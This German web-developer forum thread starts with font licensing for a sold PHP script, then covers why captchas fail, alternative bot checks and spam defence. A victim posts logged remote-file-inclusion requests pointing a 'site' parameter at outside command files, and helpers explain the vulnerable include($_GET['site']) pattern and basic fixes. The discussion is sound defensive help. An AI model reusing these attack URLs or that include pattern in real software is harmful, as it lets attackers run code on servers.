True Type Fonts Schriftart in Kommerzielles Skript verwenden??
0 1 Captchas
0 0 0 0 
Gunnar Bittersmann
0
0
0 
Jonathan
True Type Fonts Schriftart in Kommerzielles Skript verwenden??
MudGuardHi Leute,
es geht darum das ich ein PHP Skript habe, das ich zum Verkauf anbiete.
Nun brauch ich für das erstellen eines Captschas Bildes für mein
Kontaktformular eine True Type Schriftart, die in dem PHP Skript
enthalten sein soll.
Darf ich eine TTF Schriftart einfach mit dem Skript aushändigen?
Hoffe auf Antwort.
Gruss
Ko
-
ein PHP-Skript habe, das ich zum Verkauf anbiete.
Nun brauch ich für das Erstellen eines Captscha-Bildes für mein
Kontaktformular eine True-Type-Schriftart, die in dem PHP-Skript
enthalten sein soll.Darf ich eine TTF-Schriftart einfach mit dem Skript aushändigen?
Wenn du das Recht hast, die Schrift weiterzugeben, ja. Bevor du jetzt sagst, dass doch genau dies die Frage war, die du gestellt hast: Hier kann niemand wissen, welche Lizenzen du für eine Schrift X hast. Frage den Gestalter der Schrift oder wen immer er für den Vertrieb seiner Arbeit eingesetzt hast.
-
BTW:
Nun brauch ich für das Erstellen eines Captcha-Bildes für mein Kontaktformular
Ein sehr großer Teil dieser textbasierten Bilder bzw. ihrer Darstellungsschemata hat sich als automatisiert auslesbar erwiesen. Gleichzeitig nimmt mit zunehmender Komplexität die Gefahr zu, dass auch Menschen sie nicht mehr lesen können. Ich habe jemanden in der Verwandschaft mit einer Farbfehlsichtigkeit, der probiert schon gar nicht mehr, den Müll einzutippen, und mir persönlich ist das mittlerweile auch einfach nur noch zu doof, ich kann meine Zeit woanders besser nutzen.
Wenn du also selbst so eine Funktion geschrieben hast, dann behaupte ich jetzt einfach mal, dass sie höchstwahrscheinlich in die erste Gruppe fällt, und wenn nicht, dann sicher in die zweite.Und selbst die Mühe der Automation machen sich Spammer übrigens nicht mehr unbedingt: Die binden die Bilder einfach in eigene Pornoseiten ein und im Gegenzug für das Entziffern bekommen Besucher dort kostenlosen Zugang. So einfach kann's sein …
-
Und selbst die Mühe der Automation machen sich Spammer übrigens nicht mehr unbedingt: Die binden die Bilder einfach in eigene Pornoseiten ein und im Gegenzug für das Entziffern bekommen Besucher dort kostenlosen Zugang. So einfach kann's sein …
nennt sich das nicht re-captcha oder so ähnlich? ;D
-
Und selbst die Mühe der Automation machen sich Spammer übrigens nicht mehr unbedingt: Die binden die Bilder einfach in eigene Pornoseiten ein und im Gegenzug für das Entziffern bekommen Besucher dort kostenlosen Zugang. So einfach kann's sein …
nennt sich das nicht re-captcha oder so ähnlich? ;D
Ich hab grad gesehen was für Captschas von den Bots erkannt werden.
Mein lieber Scholli, hätte ich nicht gedacht das bestimmte Captschas
gelesen werden können. Also Captschas Adee.Ich kann es mir nun nicht vorstellen das eine simple Rechenaufgabe, statt
eines Captschas besser ist. Weis jemand darüber etwas.
Oder sonst eine Idee. Ich bekomme mein Formular einfach nicht sicher.
Hatte 29.000 Mails das Zweite mal wurde meine Seite off genommen.Danke für die bisherigen Antworten.
-
textbasierende mit rechenaufgaben können von bots auch relativ leicht gelesen werden - auf php.net funktioniert dieser ansatz aber seltsamerweise recht gut
alternativen sind einfach aufgaben
zb:
fahrrad, berg, kiste, hund, katze, mausgib das zweite tier aus der liste in das textfeld ein
-> katzesolche aufgaben sind für bots relativ schwer lösbar, für die meisten menschen jedoch ohne grosse probleme
man sollte natürlich geschichten wie "lärche/lerche" vermeiden :D
-
Hallo suit,
fahrrad, berg, kiste, hund, katze, maus
gib das zweite tier aus der liste in das textfeld ein
-> katzesolche aufgaben sind für bots relativ schwer lösbar
hä?
Das ist jawohl fast trivial maschinell lösbar.
index = array("erste","zweite",...).position(frageposition)
antworten = liste.explode(", ")
for each item in antworten
if inliste(listevon(gefragtesding),item)
i++
if i = index
return itemMan braucht nur noch ne liste mit tieren usw., die sehr viel einfacher erstellbar sein sollte, als ein aufwändiges Bilderkennungsprogramm.
Jonathan
-
natürlich ist die frage nicht immer nach diesem schema zusammengesetzt
kreditkarte breitmaulfrosch bargeld bankomatkarte
frage: welches wort in der liste ist kein zahlungsmittel?auto fahrrad brot schnitzel
frage: die anzahl an fahrzeugen als wort?der nachteil an dieser methode ist, man braucht wortkatalog der jedem wort charakteristika zuordnet, einen fragenkatlog und einen algorithmus, der den entsprechende fragearten vorgibt
warum die mensch maschine erkennungen auf php.net funktionieren ist mir sowieso ein rätsel
da steht zb
min(1,5)
und als antwort gibts du
1
dafür brauchst nur ein eval und die sache hat sich-
Hi!
kreditkarte breitmaulfrosch bargeld bankomatkarte
frage: welches wort in der liste ist kein zahlungsmittel?auto fahrrad brot schnitzel
frage: die anzahl an fahrzeugen als wort?Hoho! Das sind ja typische Fragen aus einem IQ Test für sprachliche Fertigkeiten - wenn man den Schwierigkeitsgrad etwas anhebt, dass hält man nicht nur BOTs draussen *G*.
Das Problem beginnt allerdings, wenn Menschen mit wenig Deutschkenntnissen dann eintreten wollen; als äquivalent ein englisches Beispiel (für Engländer trivial...):maple - rattle - oak - beech
Which word (index) doesn't signify a tree name?Grüsse,
Richard-
@@ritschmanhard:
maple - rattle - oak - beech
Which word (index) doesn't signify a tree name?Ich nehm den 50:50-Joker. ;-)
Live long and prosper,
Gunnar--
„Das Internet ist ein großer Misthaufen, in dem man allerdings auch kleine Schätze und Perlen finden kann.“ (Joseph Weizenbaum)-
@@ritschmanhard:
maple - rattle - oak - beech
Which word (index) doesn't signify a tree name?Ich nehm den 50:50-Joker. ;-)
Live long and prosper,
GunnarEinerseits bin ich etwas beruhigt das es ein so allgemeines Problem ist.
Anderseits hilft es mir natürlich überhaupt nicht.
Habe nun die die Eingaben im Formular mit was weiß ich was alles
gefiltert. Hab nen unsichtbares Feld angelegt sowie ne einmenütige
Zeitspanne die zwischen den erneuten abschicken des Forms steht.
Nen Captscha hab ich natürlich auch dazu gepackt. Nu wollte ich es
grad mit ein paar netten Fragen versuchen.Ich bin so schlau wie zuvor. :(
Ich hab das mit der email adressse und dem n. Zeichen nicht verstanden.
Was ist denn das n. Zeichen. Sollte das n. ein at Zeichen sein?Das ist vielleicht ein hammer Forum Beitrag. 50: 50 Joker. LOL
Eins noch. Kann mir jemand verraten wie die Bots das anstellen, soviele
Mails zu senden wenn das Formular nur alle 60 sekunden abgeschickt werden kann und dazu die ganzen Header Infos wie z.B. Bcc: Cc: etc. ausgefilter
werden? Kapier das nicht. Vielleicht kann ich mir helfen wenn ich das
schnalle.Gruss
Kodi-
Hallo Kodi,
Ich hab das mit der email adressse und dem n. Zeichen nicht verstanden.
Was ist denn das n. Zeichen. Sollte das n. ein at Zeichen sein?n ist ein zufälliger Platzhalter. Mal fragst das Script nach den 2. Zeichen, mal nach den 7. usw. Mit @ hat das nichts zu tun.
Eins noch. Kann mir jemand verraten wie die Bots das anstellen, soviele
Mails zu senden wenn das Formular nur alle 60 sekunden abgeschickt werden kannMan kann beliebig oft irgendwelche Formulardaten an den Server schicken. Du musst halt sicherstellen, dass der Server blockiert, wenn zuviele Anfragen hintereinander un zu kurzer Zeit kommen.
Das Formular Clientseitig z.B. mit Javascript zu manipulieren ist nutzlos. Ein bot verarbeitet kein javascript und kümmert sich meiste auch nicht sonderlich ums Formular, sondern sendet einfach eine POST- bzw. GET- Abfrage an den Server.
Jonathan
-
Man kann beliebig oft irgendwelche Formulardaten an den Server schicken. Du musst halt sicherstellen, dass der Server blockiert, wenn zuviele Anfragen hintereinander un zu kurzer Zeit kommen.
Das Formular Clientseitig z.B. mit Javascript zu manipulieren ist nutzlos. Ein bot verarbeitet kein javascript und kümmert sich meiste auch nicht sonderlich ums Formular, sondern sendet einfach eine POST- bzw. GET- Abfrage an den Server.
Jonathan
Das mit dem Javaskript ist mir bekannt, wie ist es denn mit PHP.
Weil diese einmenütige Sperre über PHP läuft.
Datt doch alles kokolores.
Also können Bots direkte Infos über POST variablen an das Skript schicken.
Warum greift diese einmenütige Sperre da bloß nicht ein und sperrt die
anfrage an das Skript? So viele Fragen.Danke dir Jonathan, ich schau mir das mal mit dem n. an.
(Nu verstehe ich n ist gleich beliebige Anzahl, wie in der Schule :)Eine Frage noch. Könnte jemand der die Formularangaben per Hand
direkt ins Formular eingibt dann überhaupt noch Massenmails über das Skript
versenden? Das geht dann wohl garnicht oder?-
Möchte nun eigentlich nicht selber hier spamen.
Hab etwas in den Logs gefunden.
Kann es sein das über eine GET Variable die Spamattacken
ausgeführt werden?meineseite.php?site=http://www.cmdlist.xpg.com.br/cmd.txt
oder z.b.
meineseite.php?site=http://www.vuls2008.kit.net/rev.txtin der Zweiten txt steht irgendwie auch was von wegen smtp.
Ist es das? Und jemand ne Idee wie ich mich davor schützen kann.
Ich glaub das ist es.Bis so dermassen gespannt.
-
Hallo Kodi,
meineseite.php?site=http://www.cmdlist.xpg.com.br/cmd.txt
oder z.b.
meineseite.php?site=http://www.vuls2008.kit.net/rev.txtin der Zweiten txt steht irgendwie auch was von wegen smtp.
Ist es das? Und jemand ne Idee wie ich mich davor schützen kann.
Ich glaub das ist es.Naja, der angreifer schickt dir hier einfach irgendwelche GET-Parameter. Das ist prinzipiell unproblematisch. Allerdings nur sofern dein Script nicht darauf reagiert.
Wenn du in deinem PHP-Dateien sowas hast wie include($_GET["site"]); dann includest du u.U. die angebene Datei, die dann allen möglichen Schadcode auf deinem Server ausführen kann, z.B. Mails versenden, Dateien löschen/verändern/auslesen usw.
Jonathan
-
Wenn du in deinem PHP-Dateien sowas hast wie include($_GET["site"]); dann includest du u.U. die angebene Datei, die dann allen möglichen Schadcode auf deinem Server ausführen kann, z.B. Mails versenden, Dateien löschen/verändern/auslesen usw.
Jonathan
Ja Jonathan. Das wohl fast peinlich stimmts?
Ich bin ein blutiger Anfänger. Sowas dürfte nicht passieren.
Ich include tatsächlich direkt über die GET[site] Var.Jetzt brauch ich noch dringeder Hilfe. Oh mein Gott.
Ich will nicht auf die Knie fallen aber wie kann ich das
Problem Lösen. Wenn ich nur die .txt Dateien nicht zum Includen
zulasse, ist das Problem sicher nicht gelöst.Warum hab ich geglaubt das eine PHP Seite von einem anderen Server
nichts anrichten kann auf meinen eigenen Server?Ich trau mich garnicht zu fragen mach es aber.
Wie kann ich es verhindern das fremder Code über die GET VAR
eingescleust wird. Einfach keine Variable includen lassen die ein
http:/ enthält oder? Würde doch ausreichen.Sorry für mein blödheit.
-
Hallo Kodi,
Ja Jonathan. Das wohl fast peinlich stimmts?
Ich bin ein blutiger Anfänger. Sowas dürfte nicht passieren.
Ich include tatsächlich direkt über die GET[site] Var.Ja, die Situation ist schön ziemlich blöd.
Nimm auf jeden Fall sofort die Seite aus dem Internet, wer weiß, was man damit sonst noch alles anstellen kann.Jetzt brauch ich noch dringeder Hilfe. Oh mein Gott.
Ich will nicht auf die Knie fallen aber wie kann ich das
Problem Lösen. Wenn ich nur die .txt Dateien nicht zum Includen
zulasse, ist das Problem sicher nicht gelöst.Nein.
Ich trau mich garnicht zu fragen mach es aber.
Wie kann ich es verhindern das fremder Code über die GET VAR
eingescleust wird. Einfach keine Variable includen lassen die ein
http:/ enthält oder? Würde doch ausreichen.Überprüfe auf jeden Fall den GET-parameter. Du solltest dann z.B. nur normale Zeichen von a-z zulassen und irgendwelche Prade und Endungen im Script dranhängen.
Nimm aber wie gesagt erstmal die Seite aus dem Netz und informiere dich bitte über die grundlegenden Methoden um sicheren COde zu machen. Möglicherweise hast du noch andere kritische Anfängerfehler gemacht.
Jonathan
-
Nimm aber wie gesagt erstmal die Seite aus dem Netz und informiere dich bitte über die grundlegenden Methoden um sicheren COde zu machen. Möglicherweise hast du noch andere kritische Anfängerfehler gemacht.
Jonathan
Ich ändere das. Ich danke dir noch einmal.
Falls noch ein Hinweis oder dergleichen einfällt, nur zu.
Kann es gebrauchen.Danke und riesen Gruss
Kodi
-
-
-
-
-
-
-
-
-
Hi,
maple - rattle - oak - beech
Which word (index) doesn't signify a tree name?cu,
Andreas--
Warum nennt sich Andreas hier MudGuard?
O o ostern ...
Fachfragen unaufgefordert per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
-
-
Hallo suit,
natürlich ist die frage nicht immer nach diesem schema zusammengesetzt
Dann programmierst du halt jede Fragestruktur auf deiner Webseite auch in den Bot ein. Der Aufwand auf beiden Seiten ist bei der methode jedenfalls proportional, was dazu führt, dass man enormen Aufwand treiben muss um motivierte Bot-Entwickler zu behindern. Mal ganz abgesehen davon, dass man solche Fragen ebenfalls auf Pornoseiten kopieren kann.
Jonathan
-
Der Aufwand auf beiden Seiten ist bei der methode jedenfalls proportional
klick :D
genau darauf will ich hinaus - wo zieht man die grenze? eine simple rechenaufgabe, ein komplexes bild - egal was, es lässt sich JEDE mensch-maschine-erkennung umgehen, indem man den algorithmus, sprich den lösungsweg, reproduziert oder indem man wirklich einen menschen ransetzt.
nur wo zieht man die grenze, wo ist der aufwand für den entwickler kleiner als für den botentwickler, wo liegt die grenze für einen menschen?
bilder fallen flach, da sie nicht barrierefrei sind, ebenso gesprochener text - 90% der leute gehen davon aus, dass eine barrierefreie seite für blinde geeignet sein muss - was ist mit schwerhörigen oder menschen mit körperlichen behinderungen, die sich zb beim bedienen der maus schwer tun?
im endeffekt MUSS die aufgabe im klartext bestehen
das bringt uns wieder zu den lösbaren aufgaben - für simple rechnungen reicht es, die gleichung aufzulösen und das ist in fast jeder scriptsprache ein einzeiler
komplexere aufgaben - wie zb auf php.net - erfordern, dass jemand die funktionen selbst kennt - mit substr('blahblahblah', -3, 1) kann jemand der diese funkion kennt etwas anfangen, ein normaler benutzer nicht (das ist sogar für einen bot einfach lösbar)
wortbasierende aufgaben scheitern an der sprachbarriere
die beste lösung ist verschiedene faktoren zu prüfen
zb:
die länge des formulars und die dafür benötigte ausfüllzeit
ob vor dem formular eine bestimmte andere seite ausgeführt wurde (mehrseitiges formular wo man ein zweites mal bestätigen)
den referrer checken (macht aber probleme wenn deaktiviert ist)prinzipiell muss ein mensch anhand der schnittmenge dieser eigenschaften erkannt werden und wenn zu viele faktoren nicht zutreffen, dann ist es ein bot ;)
-
Hi Jonathan!
Mal ganz abgesehen davon, dass man solche Fragen ebenfalls auf Pornoseiten kopieren kann.
Wie ich bereits unten geschrieben habe, kann man das so machen, dass dieser Effekt abgewehrt werden kann:
Frage: Was gehört nicht in die Gruppe:
Parallelogramm - Ellipse - Raute - Rechteck?Fragen dieser Art sollten P.seitenbesucher durchaus zu denken geben - und der Schwierigkeitsgrad ist ja beliebig steigerbar.
Generell ist es aber nicht ratsam, die sprachliche Intelligenz abzufragen, da diese (wie bereits erwähnt) für ausländische Seitenbesucher eine Blockade darstellt.
Besser sind Fragen der Art:A****************B
* * *
* X X * X *
* X * X *
* X * X X *
******************
* * *
* X * X *
* X X X * X X X *
* * *
C****************D
Welches Element (X stilisiert) passt nicht in die Gruppe?Grüsse,
Richard-
Besser sind Fragen der Art:
A****************B
* * *
* X X * X *
* X * X *
* X * X X *
******************
* * *
* X * X *
* X X X * X X X *
* * *
C****************D
Welches Element (X stilisiert) passt nicht in die Gruppe?ich würd hier natürlich sagen rechts unten - aber es gibt viele menschen die räumliche orientierungschwächen haben, dein vorschlag ist also auch ungeeignet ;)
-
Hallo ritschmanhard,
Frage: Was gehört nicht in die Gruppe:
Parallelogramm - Ellipse - Raute - Rechteck?Fragen dieser Art sollten P.seitenbesucher durchaus zu denken geben - und der Schwierigkeitsgrad ist ja beliebig steigerbar.
Willst du etwa behaupten, dass intelligente Menschen nichts für Pornos übrig haben? Das müsste erstmal bewiesen werden.
Besser sind Fragen der Art:
A****************B
* * *
* X X * X *
* X * X *
* X * X X *
******************
* * *
* X * X *
* X X X * X X X *
* * *
C****************D
Welches Element (X stilisiert) passt nicht in die Gruppe?1. Das ist nicht immer eindeutlig lösbar und auch nicht wirklich einfach. Mal ganz abgesehen, wenn man nur die Antwortmöglichkeiten A,B,C und D hat, braucht ein Bot einfach nur irgendeins auszuprobieren und hat dann zumindest 25% Chance die richtige Antwort zu treffen. Dann macht der Bot eben 1000 Abfragen (natürlich über ein paar Stunden verteilt und von verschiedenen IP-Adressen, User Agents usw.) und schon hat man ≈250 Spameinträge, Registrierungen oder wasauch immer.
Jonathan
-
Hi Jonathan!
Willst du etwa behaupten, dass intelligente Menschen nichts für Pornos übrig haben? Das müsste erstmal bewiesen werden.
Nö, überhaupt nicht - aber ich denke, dass wahrscheinlich ein Unterschied zwischen P. im Allgemeinen und P. Seiten Nutzern gemacht werden kann - und dass z.B. der durchschnittliche SELFHTMLer ein bissl mehr im Kopf hat, als der durchschnittliche P.Seiten Nutzer (wobei ich durchaus manchmal am Zweifeln bin - auch was mich selbst betrifft...).
- Das ist nicht immer eindeutlig lösbar und auch nicht wirklich einfach. Mal ganz abgesehen, wenn man nur die Antwortmöglichkeiten A,B,C und D hat, braucht ein Bot einfach nur irgendeins auszuprobieren und hat dann zumindest 25% Chance die richtige Antwort zu treffen. Dann macht der Bot eben 1000 Abfragen (natürlich über ein paar Stunden verteilt und von verschiedenen IP-Adressen, User Agents usw.) und schon hat man ≈250 Spameinträge, Registrierungen oder wasauch immer.
Je nach Absicherung kann man auch zwei oder mehr solche Dinger auf eine Seite legen (ergibt dann Ratechance von 1/4^x, bereits bei 4 Stück nur noch bei jeder 256ten Anfrage erfolgreich...)
Und zur eindeutigen Lösbarkeit: diese ist im Normalfall schon gegeben - manchmal ergeben sich für hochintelligente Personen noch andere als die triviallogischen Lösungsmöglichkeiten, aber das ist sehr selten...
Zum Thema "nicht einfach": Hier stimme ich zu (insbesondere dem Argument, dass es Menschen gibt, die exakt mit solchen Aufgaben Probleme haben - für diese kann man dann ja alternativ die bereits vorher angesprochenen sprachlichen Tests zur Verfügung stellen alla link[die Aufgabe hier ist mir nicht klar]
==> A elch, B hase,D regenwurm,E esel - wer hat keine Ohren?Grüsse,
Richard-
Hallo ritschmanhard,
Je nach Absicherung kann man auch zwei oder mehr solche Dinger auf eine Seite legen (ergibt dann Ratechance von 1/4^x, bereits bei 4 Stück nur noch bei jeder 256ten Anfrage erfolgreich...)
Klar. Ich glaube, wenn ich vor der Anmeldung erstmal nen Intelligenztest machen müsste, würde ich mir ne andere Webseite suchen. Bzw. deine Webseite würde mangels Benutzer nie bekannt und relevant werden.
==> A elch, B hase,D regenwurm,E esel - wer hat keine Ohren?
Genauso trivial mit 25-prozentiger Wahrscheinlichkeit richtig lösbar.
Jonathan
-
Hi,
==> A elch, B hase,D regenwurm,E esel - wer hat keine Ohren?
Der Hase, der hat Löffel ;-)
cu,
Andreas--
Warum nennt sich Andreas hier MudGuard?
O o ostern ...
Fachfragen unaufgefordert per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
-
-
Hi,
Frage: Was gehört nicht in die Gruppe:
Parallelogramm - Ellipse - Raute - Rechteck?Das Parallelogramm, weil es als einziges keine zwei aufeinander senkrecht stehende Symmetrieachsen hat?
Oder die Ellipse, weil sie als einzige kein R enthält (oder kein Viereck ist)?
Oder das Rechteck, weil es als einziges garantiert rechtwinklig ist?
(wenn ich noch etwas nachdenken würde, fiele mir sicher auch noch was ein, warum es die Raute sein könnte ...)
cu,
Andreas--
Warum nennt sich Andreas hier MudGuard?
O o ostern ...
Fachfragen unaufgefordert per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
-
@@MudGuard:
Frage: Was gehört nicht in die Gruppe:
Parallelogramm - Ellipse - Raute - Rechteck?(wenn ich noch etwas nachdenken würde, fiele mir sicher auch noch was ein, warum es die Raute sein könnte ...)
Weil sie als einzige schon in einer anderen Kategorie enthalten ist.
Live long and prosper,
Gunnar--
„Das Internet ist ein großer Misthaufen, in dem man allerdings auch kleine Schätze und Perlen finden kann.“ (Joseph Weizenbaum)-
@@Gunnar Bittersmann:
Frage: Was gehört nicht in die Gruppe:
Parallelogramm - Ellipse - Raute - Rechteck?(wenn ich noch etwas nachdenken würde, fiele mir sicher auch noch was ein, warum es die Raute sein könnte ...)
Weil sie als einzige schon in einer anderen Kategorie enthalten ist.
Au weia, ich sollte meine Geometriekenntnisse auffrischen.
Wo ist der Delete-Posting-Button?
Live long and prosper,
Gunnar--
„Das Internet ist ein großer Misthaufen, in dem man allerdings auch kleine Schätze und Perlen finden kann.“ (Joseph Weizenbaum) -
Hi,
Frage: Was gehört nicht in die Gruppe:
Parallelogramm - Ellipse - Raute - Rechteck?
(wenn ich noch etwas nachdenken würde, fiele mir sicher auch noch was ein, warum es die Raute sein könnte ...)Weil sie als einziges ein u enthält.
cu,
Andreas--
Warum nennt sich Andreas hier MudGuard?
O o ostern ...
Fachfragen unaufgefordert per E-Mail halte ich für unverschämt und werde entsprechende E-Mails nicht beantworten. Für Fachfragen ist das Forum da.
-
-
-
-
-
-
-
-
@@Kodi:
Ich hab grad gesehen was für Captschas von den Bots erkannt werden.
Mein lieber Scholli, hätte ich nicht gedacht das bestimmte Captschas
gelesen werden können. Also Captschas Adee.Ja. Aber vor allem aus dem Grund, dass sie nutzerfeindlich sind. Und alles andere als barrierefrei.
(Und da sie nicht weiter verwenden willst, brauchst du dir um deren richtige Schreibweise auch keine Gedanken mehr machen. ;-))
Ich kann es mir nun nicht vorstellen das eine simple Rechenaufgabe, statt
eines Captschas besser ist.Ich auch nicht. Nutzer möchten Inhalte zu sehen bekommen oder mit der Website interagieren, aber gewiss dafür keine Rechenaufgaben lösen.
Lass dir was besseres einfallen, um Formulare sicher gegen Spam-Bots zu machen.
Live long and prosper,
Gunnar--
„Das Internet ist ein großer Misthaufen, in dem man allerdings auch kleine Schätze und Perlen finden kann.“ (Joseph Weizenbaum)-
[latex]Mae govannen![/latex]
gelesen werden können. Also Captschas Adee.
Ja. Aber vor allem aus dem Grund, dass sie nutzerfeindlich sind. Und alles andere als barrierefrei.
(Und da sie nicht weiter verwenden willst, brauchst du dir um deren richtige Schreibweise auch keine Gedanken mehr machen. ;-))
Ack.
Mir geht gerade rapidshare ganz gewaltig auf den Keks mit ihren neuen Captchas ... man bekommt dort zur Zeit sowas vorgesetzt:
Je nach Buchstaben/Zahlen- und Hintergrundposition kann ich auch nicht alle Codes immer zweifelsfrei erkennen.
Ist der letzte Buchstabe des ersten Bildes ein C oder ein G? Ist das letzte Zeichen des zweiten Bildes ein S oder eine 8? Wie soll erst ein sehbehinderter Mensch soetwas auseinanderhalten können?
Captchas sind eine Pest.
Cü,
Kai
--
Some things in life are bad, they can really make you mad
Other things just make you swear and curse.
When you're chewing on life's gristle, don't grumble, give a whistle
And this'll help things turn out for the best...
ie:{ fl:( br:< va:) ls:? fo:| rl:? n4:° ss:{ de:] js:| ch:? mo:| zu:|]-
Hi Kai345,
Wie soll erst ein sehbehinderter Mensch soetwas auseinanderhalten können?
Einfach Premium User werden, dann haste auch nichts mit irgendwelchen Captchas und wartezeiten zutun. :)
Grüße aus H im R,
Engin
-
-
-
Ich kann es mir nun nicht vorstellen das eine simple Rechenaufgabe, statt
eines Captschas besser ist. Weis jemand darüber etwas.Auch das lässt sich automatisiert erledigen, genauso wie der erst vor ein paar Tagen hier im Forum gemachte Vorschlag, zusätzlich zur eigenen E-Mail-Adresse auch noch das n. Zeichen aus dieser Adresse eingeben zu müssen.
Aber wie ich auf bereits in meiner dortigen Antwort schrieb, ist der Punkt bei diesen Abfragen letztlich nicht, ob das Überwinden theoretisch möglich ist (das ist es früher oder später beinahe immer), sondern ob es in der Praxis geschieht.
Wer ein Allerweltssystem einsetzt, muss sich nicht wundern, wenn irgendein Spammer sich technisch darum kümmert. Je öfter der Spammer seine Überwindungsmethode einsetzen kann, desto geringer wird der anteilige Aufwand für die Programmierung derselben, und desto höher ist zudem die Wahrscheinlichkeit, dass sich schon jemand hingesetzt und so eine Methode entwickelt hat.Daher Grundregel Nummer 1: Nicht der Herde hinterher rennen, sondern was Eigenes machen. Von der eingangs angesprochen Zeichen-aus-Adresse-Methode vermute ich aus diesem Grund trotz ihrer Einfachheit eine hunderprozentige Effizienz - jedenfalls so lange, bis jedes piefige phpBB-Board sie auch einsetzt.
Oder sonst eine Idee. Ich bekomme mein Formular einfach nicht sicher.
Überprüfe erstmal, wie die Spambots vorgehen. Vielleicht rufen sie das Formular ja gar nicht mehr ab, sondern POSTen gleich? Dann bräuchtest du nur eine Liste führen, wer in den letzten 10 Minuten das Formular ordnungsgemäß per GET abgerufen hat, alle anderen bekommen beim Absenden nur wieder das (dann bereits ausgefüllte) Formular zu sehen, quasi als Vorschau.
Hatte 29.000 Mails das Zweite mal wurde meine Seite off genommen.
Mich dünket, dass es unter diesen Umständen schon helfen würde, nicht alle halbe Sekunde vom selben Host Formulardaten anzunehmen …
-
-
-
-
Darf ich eine TTF-Schriftart einfach mit dem Skript aushändigen?
Wenn du das Recht hast, die Schrift weiterzugeben, ja. Bevor du jetzt sagst, dass doch genau dies die Frage war, die du gestellt hast: Hier kann niemand wissen, welche Lizenzen du für eine Schrift X hast. Frage den Gestalter der Schrift oder wen immer er für den Vertrieb seiner Arbeit eingesetzt hast.
Oh, das aber nicht einfach den Gestalter ausfindig zu machen.
Aber ich danke dir für die Antwort.Gruss
Ko
-
-
Hallo Kodi,
Darf ich eine TTF Schriftart einfach mit dem Skript aushändigen?
Sofern die Schrift nicht von dir erstellt wurde, natürlich generell nicht. Wenn du eine Schrift nimmst, die sowieso gratis downloadbar ist, ist es wohl unproblematisch, aber auch da solltest du dir ne Erlaubnis vom Ersteller einholen (sofern dir eine Lizenz solche Weiterverbereitung nicht sowieso erlaubt).
Jonathan
